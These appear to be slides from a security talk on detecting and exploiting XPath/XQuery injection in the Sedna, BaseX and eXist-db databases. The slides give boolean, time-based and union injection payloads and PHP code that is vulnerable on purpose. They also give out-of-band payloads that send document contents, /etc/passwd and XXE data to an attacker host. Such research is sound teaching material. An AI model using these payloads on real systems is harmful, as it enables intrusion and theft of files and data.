Detection & exploiting Xpath/Xquery injections. The other ways. Savkov Boris 

What will be discussed today? • Xpath/XQuery • Boolean-based • Time-based • Request-based • Union-based • Xquery DB • XXE in XQuery 

Reasons? • injection class vulnerability • prevalence 

XPath XPath is used to navigate through elements and attributes in an XML document. XPath became a W3C Recommendation 16. November 1999. XPath is a major element in W3C's XSLT standard - and XQuery and XPointer are both built on XPath expressions Standards: 1.0, 2.0, 3.0. 

XPath examples /.../node[@attribute=value]/.../text() • child::text() • child::node() • attribute::node() • child::processing-instruction() • child::comment() • child::namespace-uri() • name(/…/node) 

XPath examples British people are my only 'boss' on EU reform, says David Cameron BoE says part of banking payment system down /root/News/current_news/page[@ID='1']/info/ //page[1]//text() /*[1]/*[3]/*[1]/*[1]/*[1]/text() 

XQuery XQuery is to XML what SQL is to database tables. XQuery 1.0 became a W3C Recommendation January 23, 2007. XQuery is designed to query XML data - not just XML files, but anything that can appear as XML, including databases. Standards: 1.0, 3.0. 

XQuery examples British people are my only 'boss' on EU reform, says David Cameron BoE says part of banking payment system down for $i in doc("examples/example.xml")//page[@ID="1"]/info/text() return

{$i}



XQuery Databases Sedna 3.5, BaseX 8.11, eXit-db 2.2. 

Boolean-based •count() • string-length() • substring(,,) 1'and count(/*[1])=1 and '1'='1 1'and string-length(name(/*[1]))=4 and '1'='1 1'and substring(name(/*[1]),1,'r')=1 and '1'='1 

XML document British people are my only 'boss' on EU reform, says David Cameron BoE says part of banking payment system down Current exchange rate US DOLLAR (USD) - ≤50 RUSSIAN RUBLE (RUB) 

Vulnerable code public function select($param) { $this->session->execute("open ".$this->database); $input = 'for $i in doc("tests/news.xml")//News[@ID="'.$param.'"]'. '/info/text() return

{$i}

'; $query = $this->session->query($input); while($query->more()) { print $query->next()."\n"; } $query->close(); } 

1" and "1"="0 

1" and "1"="1 

Time-based • root() • if-then • 1'and reverse(-9999 to 9999)=0 and '1'='1 

XML document 18923172 Arnold Baker ABaker 53282c05d16f28057602d1253757c289 Admin 94203127 Peter Pan PPan 5f276221c0860f39e17846f2c29d507e User 57394309 Gandalf the Grey Mithrandir c5f7d86f237453de41c38a7d886c5a9c User 

Vulnerable code public function select($uid, $username) { $this->session->execute("open ".$this->database); $input = 'doc("tests/users.xml")//Users[./UserName="'.$username.'"]/*[name()="UID"]/text()'; $query = $this->session->query($input); if($query->next() === $uid){ $query->close(); $input = 'for $i in doc("tests/users.xml")//Users[./UID="'.$uid.'"]'. '/*[name()="FirstName" or name()="LastName"]/text() return

{$i}

'; $query = $this->session->query($input); while($query->more()) { print $query->next()."\n"; } } $query->close(); } 

False 

True 

Request-based • doc •concaten • code-for-uri doc(concat("Your public ip",encode-for-uri(name(/*[1]))) 

No content

Remarks • Doesn't work in Sedna • XXE with doc doc(concat("Your public ip",encode-for-uri(doc("Your public ip/XXE.xml")))) • unparsed-text doc(concat("Your public ip",encode-for-uri(unparsed-text("/etc/passwd")))) • XXE and BaseX doc(concat("http://192.168.56.101:9090/",encode-for-uri(doc("]>&c; ")))) 

Union-based 0' and 1=0] | //* | /*['0 

Sedna 

BaseX 

eXist-db 

Questions?